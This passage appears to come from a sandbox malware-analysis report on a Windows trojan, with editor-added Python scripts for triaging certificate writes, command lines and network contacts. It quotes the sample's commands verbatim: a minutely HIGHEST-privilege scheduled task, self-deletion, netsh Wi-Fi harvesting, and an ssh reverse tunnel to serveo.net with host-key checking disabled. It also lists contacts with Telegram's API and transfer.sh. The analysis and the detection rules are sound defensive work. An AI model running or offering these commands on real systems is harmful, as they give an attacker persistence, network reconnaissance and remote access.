Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A
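The "Modifies system certificate store" hit above deserves a second look before it is read as trust-store tampering. The three thumbprints are, as identified by the editor and not by the report, the SHA-1 fingerprints of well-known public roots: CABD2A79… is ISRG Root X1, DAC9024F… is DST Root CA X3 and A8985D3A… is DigiCert Global Root CA. Two are written under AuthRoot, which is where CryptoAPI's automatic root update places roots it fetches the first time a process builds a chain to them; a Windows 7 image without recent root updates doing that in the context of the sample's own HTTPS connections is the most plausible explanation, and the Win10 run shows no such hit. The one written under ROOT by a binary in a user-writable directory is the row worth confirming, and only after the Blob has been decoded, which this report elides. The Python below is an added example by the editor, not part of the report: it parses the registry rows, treats only the Blob write as an installation, and grades each thumbprint by whether it is a known public root and which store it landed in. The events are embedded as constructed input copied from the rows above plus one placeholder thumbprint (forty F characters, not a real certificate) to exercise the unknown-root branch; the severity labels and the known-root table are my own.

```python
import re

# SHA-1 thumbprints of the three certificates in the report and the public roots
# they belong to. In practice, back this with a full trusted-root list.
KNOWN_PUBLIC_ROOTS = {
    "CABD2A79A1076A31F21D253635CB039D4329A5E8": "ISRG Root X1",
    "DAC9024F54D8F6DF94935FB1732638CA6AD77C13": "DST Root CA X3",
    "A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436": "DigiCert Global Root CA",
}

SAMPLE_EXE = (r"C:\Users\Admin\AppData\Local\WindowsSecurity"
              r"\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe")
CERT_STORES = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates"
PLACEHOLDER_THUMB = "F" * 40   # hypothetical, not a real certificate: exercises the unknown-root branch

# Constructed input: (operation, registry key, writing process) in the order the
# report lists them, plus the placeholder row.
EVENTS = [
    ("Set value (data)", rf"{CERT_STORES}\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob", SAMPLE_EXE),
    ("Key created", rf"{CERT_STORES}\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13", SAMPLE_EXE),
    ("Set value (data)", rf"{CERT_STORES}\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob", SAMPLE_EXE),
    ("Key created", rf"{CERT_STORES}\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436", SAMPLE_EXE),
    ("Set value (data)", rf"{CERT_STORES}\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob", SAMPLE_EXE),
    ("Key created", rf"{CERT_STORES}\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8", SAMPLE_EXE),
    ("Set value (data)", rf"{CERT_STORES}\ROOT\Certificates\{PLACEHOLDER_THUMB}\Blob", SAMPLE_EXE),
]

KEY_RE = re.compile(
    r"\\SystemCertificates\\(?P<store>[A-Za-z]+)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})(\\\w+)?$")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)


def parse_event(op, key, process):
    """Extract store, thumbprint and whether this event actually installs a cert."""
    m = KEY_RE.search(key)
    if not m:
        return None
    return {"store": m.group("store").lower(), "thumb": m.group("thumb").upper(),
            "installs": op.startswith("Set value") and key.upper().endswith(r"\BLOB"),
            "process": process}


def triage_cert_events(events):
    """One finding per thumbprint whose Blob was written; a bare 'Key created' installs nothing."""
    findings = {}
    for op, key, process in events:
        ev = parse_event(op, key, process)
        if ev is None or not ev["installs"]:
            continue
        name = KNOWN_PUBLIC_ROOTS.get(ev["thumb"])
        if name is None:
            severity = "high"
            why = "thumbprint not in the known public root list: treat as a trust-store implant until the Blob is decoded"
        elif ev["store"] == "authroot":
            severity = "low"
            why = "known public root in AuthRoot: consistent with CryptoAPI automatic root update triggered by the sample's own TLS connections"
        else:
            severity = "medium"
            why = "known public root, but written to the ROOT store by a user-mode process: confirm subject and serial from the Blob"
        if USER_WRITABLE.search(ev["process"]):
            why += "; writer lives in a user-writable directory"
        findings[ev["thumb"]] = {"name": name, "store": ev["store"], "severity": severity, "why": why}
    return findings


def worst_severity(findings):
    order = {"low": 0, "medium": 1, "high": 2}
    return max((f["severity"] for f in findings.values()), key=order.get, default=None)


if __name__ == "__main__":
    for thumb, f in triage_cert_events(EVENTS).items():
        print(f"{f['severity']:6s} {thumb[:8]}… {f['name'] or 'UNKNOWN':24s} [{f['store']}] {f['why']}")
```

On the report's rows alone the worst grade is "medium" (the ISRG Root X1 write to ROOT); only the placeholder row reaches "high". That matches how the signature should be weighed here: an aggravating detail to confirm, not on its own evidence of a man-in-the-middle root.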

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\System32\cmd.exe
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2128 wrote to memory of 2600 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 1004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 544 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2600 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1856 wrote to memory of 1656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2600 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 1444 wrote to memory of 2716 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2716 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1980 wrote to memory of 2752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2716 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net

C:\Windows\system32\taskeng.exe

taskeng.exe {79F8C408-9CC4-42FD-8206-69DEF0935CA1} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"
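
The command lines above show the sample's staging sequence end to end: a cmd.exe one-liner that switches the console to UTF-8, pauses with a loopback ping, registers a scheduled task that re-runs the copy under %LOCALAPPDATA%\WindowsSecurity every minute with /rl HIGHEST, force-deletes the original in %TEMP% and starts the copy; then Wi-Fi profile and BSSID collection through netsh; then a bundled OpenSSH client opening a reverse tunnel (-R 80:127.0.0.1:2598) to serveo.net with host-key checking disabled. The Python below is an added triage script, not part of the sandbox report or of the sample: it runs a few command-line rules over these lines and decodes the schtasks and ssh -R arguments. The rule names, the regexes and the ATT&CK references in the comments are the author's; the command lines in REPORT_CMDLINES are copied from the Processes list.

```python
"""Command-line triage over the Processes section of this report.

Added example, not part of the sandbox output or of the sample: the rules, the
parsers and the ATT&CK mapping in the comments are the author's; the command
lines in REPORT_CMDLINES are copied from the report's Processes list.
"""
import re

EXE = "6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe"
STAGED = r"C:\Users\Admin\AppData\Local\WindowsSecurity" + "\\" + EXE  # persistent copy
DROPPED = r"C:\Users\Admin\AppData\Local\Temp" + "\\" + EXE            # original, deleted
SSH = r"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"

REPORT_CMDLINES = [
    f'"C:\\Windows\\System32\\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && '
    f'schtasks /create /tn "{EXE[:-4]}" /sc MINUTE /tr "{STAGED}" /rl HIGHEST /f && '
    f'DEL /F /S /Q /A "{DROPPED}" &&START "" "{STAGED}"',
    '"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"',
    '"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"',
    f'"{SSH}" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2598 serveo.net',
    "ping 127.0.0.1",  # benign on its own; the sample uses it only as a delay
]

# (rule name, compiled pattern); matches are reported in this order.
RULES = [
    # Task run from a user-writable directory every minute at the highest run
    # level: persistence, T1053.005 (author's mapping).
    ("schtasks_appdata_minute", re.compile(
        r'schtasks\s+/create\b(?=.*?/sc\s+MINUTE\b)'
        r'(?=.*?/tr\s+"[^"]*\\AppData\\(?:Local|Roaming)\\)', re.I | re.S)),
    # Forced delete of one file followed by START of another: the original is
    # removed after the copy is staged, T1070.004 (author's mapping).
    ("self_delete_then_relaunch", re.compile(r'\bDEL\s+/F\b.*?\bSTART\s+""', re.I | re.S)),
    # Saved Wi-Fi profile names (a follow-up with key=clear would yield PSKs), T1016.002.
    ("wifi_profile_harvest", re.compile(r'netsh\s+wlan\s+show\s+profiles', re.I)),
    # Nearby access points with BSSID and signal strength, T1016.002.
    ("wifi_bssid_survey", re.compile(r'netsh\s+wlan\s+show\s+networks\s+mode=bssid', re.I)),
    # ssh -R to an external relay with host-key checking off: reverse tunnel, T1572.
    ("ssh_reverse_tunnel_nohostcheck", re.compile(
        r'ssh(?:\.exe)?"?\s.*?StrictHostKeyChecking=no.*?\s-R\s+\d+:', re.I | re.S)),
]


def triage(cmdline):
    """Names of the rules that match one command line."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def triage_report(cmdlines):
    """Rule hit counts across a whole process list (rules with no hits are omitted)."""
    hits = {}
    for line in cmdlines:
        for name in triage(line):
            hits[name] = hits.get(name, 0) + 1
    return hits


_CREATE_RE = re.compile(r'schtasks\s+/create\s+(?P<args>.*?)(?:\s*&&|$)', re.I | re.S)
_OPT_RE = r'/{flag}\s+(?:"(?P<q>[^"]*)"|(?P<bare>\S+))'   # quoted or bare value


def parse_schtasks(cmdline):
    """Pull /tn, /sc, /tr and /rl out of a schtasks /create; None if there is none."""
    m = _CREATE_RE.search(cmdline)
    if not m:
        return None

    def opt(flag):
        mm = re.search(_OPT_RE.format(flag=flag), m.group("args"), re.I)
        if mm is None:
            return None
        return mm.group("q") if mm.group("q") is not None else mm.group("bare")

    return {"name": opt("tn"), "schedule": opt("sc"), "target": opt("tr"), "runlevel": opt("rl")}


_TUNNEL_RE = re.compile(
    r'-R\s+(?:(?P<bind>[^\s:]+):)?(?P<rport>\d+):(?P<lhost>[^\s:]+):(?P<lport>\d+)\s+(?P<relay>\S+)')


def parse_reverse_tunnel(cmdline):
    """Decode ssh -R [bind:]port:host:hostport <relay>. The relay is assumed to be
    the next bare token after the -R spec, which holds for this sample."""
    m = _TUNNEL_RE.search(cmdline)
    if not m:
        return None
    return {"remote_port": int(m.group("rport")), "local_host": m.group("lhost"),
            "local_port": int(m.group("lport")), "relay": m.group("relay")}


if __name__ == "__main__":
    for line in REPORT_CMDLINES:
        print(triage(line) or "-", "|", line[:70])
    print(parse_schtasks(REPORT_CMDLINES[0]))
    print(parse_reverse_tunnel(REPORT_CMDLINES[3]))
```

The schtasks rule deliberately uses lookaheads so the /sc and /tr switches may appear in any order; the tunnel parser handles the optional bind address of -R, which the sample omits.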

Network

Country Destination Domain Proto Connections
N/A 127.0.0.1:2598 tcp 2
US 8.8.8.8:53 github.com udp 1
US 8.8.8.8:53 ip-api.com udp 1
US 140.82.113.3:443 github.com tcp 1
US 208.95.112.1:80 ip-api.com tcp 2
US 8.8.8.8:53 objects.githubusercontent.com udp 1
US 185.199.108.133:443 objects.githubusercontent.com tcp 1
FR 51.77.200.232:8080 51.77.200.232 tcp 40
FR 94.23.78.11:8080 94.23.78.11 tcp 40
GB 217.145.238.175:80 217.145.238.175 tcp 2
US 8.8.8.8:53 serveo.net udp 1
DE 159.89.214.31:22 serveo.net tcp 2
US 8.8.8.8:53 api.telegram.org udp 1
NL 149.154.167.220:443 api.telegram.org tcp 40
US 8.8.8.8:53 transfer.sh udp 1
DE 144.76.136.153:443 transfer.sh tcp 2
US 8.8.8.8:53 apps.identrust.com udp 1
US 2.18.121.70:80 apps.identrust.com tcp 1

Identical records are collapsed; Connections is the number of times each destination was contacted (140 connection records in total). The loopback record carries no Domain entry.
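
Three destinations dominate the Network log. The two port-8080 endpoints carry their own IP in the Domain column, so no DNS query preceded them, which is consistent with addresses embedded in the binary; api.telegram.org was resolved through 8.8.8.8 and then contacted at the same cadence. The loopback record 127.0.0.1:2598 is the local side of the ssh -R 80:127.0.0.1:2598 serveo.net command from the Processes section, and the serveo.net:22 records are the tunnel itself; github.com, objects.githubusercontent.com, transfer.sh, ip-api.com and apps.identrust.com are the remaining, name-resolved destinations. The Python below is an added analysis script, not part of the report: it parses an excerpt of the connection records (27 records, copied from the log, so its counts are lower than the full log's), separates DNS lookups from destinations, counts contacts per endpoint and flags destinations reached without a prior lookup. The "hardcoded" heuristic and the TUNNEL_LOCAL constant (read off the ssh command line) are the author's.

```python
"""Destination summary over this report's Network log.

Added example, not part of the sandbox output: NETWORK_ROWS is an excerpt of the
report's connection records (the first 27, copied verbatim); the parsing, the
'hardcoded' heuristic and TUNNEL_LOCAL (taken from the ssh -R command line in
the Processes section) are the author's.
"""
from collections import Counter
import ipaddress

NETWORK_ROWS = """\
N/A 127.0.0.1:2598 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 ip-api.com udp
US 140.82.113.3:443 github.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
GB 217.145.238.175:80 217.145.238.175 tcp
US 8.8.8.8:53 serveo.net udp
DE 159.89.214.31:22 serveo.net tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
NL 149.154.167.220:443 api.telegram.org tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
"""

# Local side of 'ssh.exe -R 80:127.0.0.1:2598 serveo.net' from the Processes list.
TUNNEL_LOCAL = ("127.0.0.1", 2598)


def parse_rows(text):
    """(country, ip, port, domain, proto) per record; the loopback record has no Domain."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            raise ValueError(f"unexpected record: {line!r}")
        ip, port = dest.rsplit(":", 1)
        rows.append((country, ip, int(port), domain, proto))
    return rows


def resolved_names(rows):
    """Names the sample looked up: the Domain column of the udp/53 records."""
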